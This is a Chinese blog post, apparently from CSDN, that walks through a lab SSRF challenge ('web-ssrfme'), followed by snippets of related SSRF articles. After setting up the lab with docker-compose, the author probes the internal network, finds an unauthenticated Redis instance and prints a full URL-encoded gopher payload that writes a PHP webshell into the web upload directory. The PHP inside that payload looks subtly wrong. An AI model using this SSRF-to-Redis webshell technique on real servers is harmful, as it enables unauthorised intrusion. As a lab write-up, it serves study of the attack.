ssrf漏洞复现分析(1)

于 2024-08-30 15:52:06 发布
阅读量418 收藏 10
点赞数 5
文章标签: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bb_lo/article/details/141719663
版权

目录

web-ssrfme

搭建环境

步骤

web-ssrfme

搭建环境

这里我们使用的是docker环境,只需要把docker压缩包下载到Ubuntu下解压后执行命令即可,

之后查看docker的images

然后构建docker-compose.yml文件即可

version: '3'
services:
        web:
                image: ctf/ssrfme
                ports:
                        - "8091:80"
        redis:
                image: web-ssrfme_redis

在这个文件目录下执行命令

docker-compose up

 

就此环境搭建成功了

步骤

首先我们直接进入访问这个ip的8091

进入题目,发现直接把源码给了,那我们分析源码,源码过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议我们使用http协议进行内网主机存活探测, 发现存在ssrf漏洞

目前还不知道当前主机的内网ip,但是源码提供了一个查看phpinfo的功能:

我们查看phpinfo,查到了当前主机的内网ip为172.21.0.2,

这个ip下重新打印了一次当前页面,仔细看后发现这个是我们当前主机ip,

在172.21.0.3下,出现了不一样的结果,

于是用bp扫描一下开放的端口发现开放了6379,访问172.21.0.3:6379之后出现了一下界面

这是redis的报错,说明这台内网主机上还运行着redis服务。 这个时候第一反应就是redis未授权访问,接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。

我们使用burp扫一下都有哪些目录,发现有个upload目录。经测试upload目录下是可写的,使用工具生成payload因为是get传参,所以我们还需要在进行url code编码,

gopher://172.21.0.3:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520/flag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0A

就这样成功拿下flag了

真的一点都不会
关注
Ueditot_jsp SSRF漏洞复现
afei001
04-09 1053
目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现 6.1 FAFO实战复现 6.2 Ueditor_SSRF_jsp-env_POC.py 7.漏洞修复 1.前言 今天在某项目对网站渗透测试时,发现某子域使用了Ueditor。百度Google发现其历史版本是有漏洞的,jsp环境的Ueditor存在SSRF,aspx环境的存在文件上传,竟然碰到了,就对该SSRF进行复现学习。 2.漏洞概述 该编辑器v1.4....
D-Tale SSRF漏洞复现(CVE-2024-21642)
0xSec
01-22 576
D-Tale 是 Pandas 数据结构的可视化工具。3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击,从而使攻击者能够访问服务器上的文件。
SSRF漏洞复现
m0_57485346的博客
03-15 1294
ssrf漏洞复现
漏洞复现】Weblogic SSRF漏洞复现
Miraitowax
02-22 1192
Weblogic SSRF的漏洞原理,漏洞复现步骤详细总结及剖析
Weblogic-SSRF漏洞复现
小小猪的博客
11-22 2842
Weblogic-SSRF漏洞复现 漏洞分析: Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。 漏洞复现: 使用docker来模拟漏洞环境 docker github地址:地址 搭建的载体为Ubuntu 搭建过程不在详述,搭建完成后,访问http://your-ip:7001/uddiexplor.
ssrf漏洞复现
Wincreds的博客
08-25 404
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
MinIO未授权SSRF漏洞复现(CVE-2021-21287)
isxiaole的博客
09-27 9127
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。
weblogic-SSRF漏洞复现SSRF原理、利用与防御)
不想当脚本小子的脚本小子
12-28 1534
一、SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。 首先,我们要对目标网站的架构了解,脑子里要有一个架构图。比如 : A网站,是一个所有人都可以访问的外网网站,B网站是一个他们内部
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 1313
vulhub中ssrf漏洞复现
ueidtor安全漏洞_UEditor SSRF漏洞(JSP版本)分析复现
weixin_33318722的博客
12-31 5000
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
Ivanti Connect Secure VPN SSRF漏洞复现(CVE-2024-21893)
0xSec
02-06 1192
漏洞是由于Ivanti Connect Secure、Ivanti Policy Secure和 Ivanti Neurons for ZTA 的 SAML 组件中存在服务器端请求伪造漏洞,因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源,结合相关功能造成远程代码执行。
基于 YOLOv5(假设为 YOLOv11)的火灾火焰烟雾检测系统(包含详细的完整的程序和数据)
10-13
本文详细介绍了一个利用深度学习模型YOLOv5构建的火灾火焰烟雾检测系统的设计和实现方法,系统能够实时识别图像中的火灾隐患并通过PyQt5实现友好的GUI交互。内容涵盖环境配置、YOLOv5模型准备及其在ONNX中的运用、以及检测逻辑和性能评估等重要环节,提供了可用于智能化监控、公共安全保障的应用方案。 适合人群:有一定深度学习基础的研发人员、安全领域从业者和计算机视觉爱好者。 使用场景及目标:该系统适合作为企业级或公共场所内的智能消防安防设备的一部分,在发生火灾初期及时提醒管理人员采取措施。 该文章适用于想要深入了解YOLOv5在具体场景下如何部署的研究人员和技术团队成员查阅。同时也可作为学习YOLOv5在实时对象检测领域的教学案例。
crcmod-1.7-cp37-cp37m-win_amd64.whl
10-13
crcmod-1.7-cp37-cp37m-win_amd64.whl
python_geohash-0.8.5-cp36-cp36m-win_amd64.whl
10-13
python_geohash-0.8.5-cp36-cp36m-win_amd64.whl
【图像加密解密】基于matlab分数傅里叶变换彩色图像加密【含Matlab源码 4543期】.md
10-13
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像加密: DNA混沌图像加密、Arnold置乱图像加密解密、Logistic+Tent+Kent+Hent图像加密与解密、双随机相位编码光学图像加密解密 正交拉丁方置乱图像加密解密、RSA图像加密解密、小波变换DWT图像加密解密、混沌结合小波变换图像加密
基于YOLOv11的人脸表情检测系统(包含详细的完整的程序和数据)
10-13
本文档详细介绍了一套使用YOLOv11实现的人脸表情检测系统的开发方法和全流程实现,其中包括高精度检测、用户友好界面和实时处理等亮点特性。此外,系统还能有效识别八种常见的人类表情。它介绍了从前期环境准备到搭建最后的GUI用户交互界面等一系列步骤。 适用人群:从事计算机视觉研究或对深度学习感兴趣的研究员与软件开发者们。 使用场景及目标:对于想要实现高效精准的表情分析和智能人机对话的应用开发者来说十分有用,如游戏娱乐行业和社交平台等都可以使用此类系统。此外,还可以用作学术教学资源,帮助学生们更好地理解并动手实施这一领域中的项目。 其他说明:本文还讨论了一些潜在的发展趋势,旨在不断优化现有的解决方案同时引入新的情感类别以及考虑将此与音频情绪判断结合,使系统更为完善。
python的匿名函数lambda
10-13
python的匿名函数lambda
GPT11111111111111111111
最新发布
10-13
GPT11111111111111111111
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个简单的 SSRF 漏洞利用的步骤: 1. 扫描目标网站:使用端口扫描工具扫描目标网站开放的端口,确定是否存在可利用的服务。 2. 构造恶意请求:构造一个包含内网地址的恶意请求,将请求地址改为内网地址。 3. 触发漏洞:将恶意请求发送给目标网站,从而触发 SSRF 漏洞。 4. 收集信息:利用 SSRF 漏洞,收集内部系统的信息,如端口、服务、操作系统等。 5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范 SSRF 漏洞,如过滤用户输入、限制请求地址等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值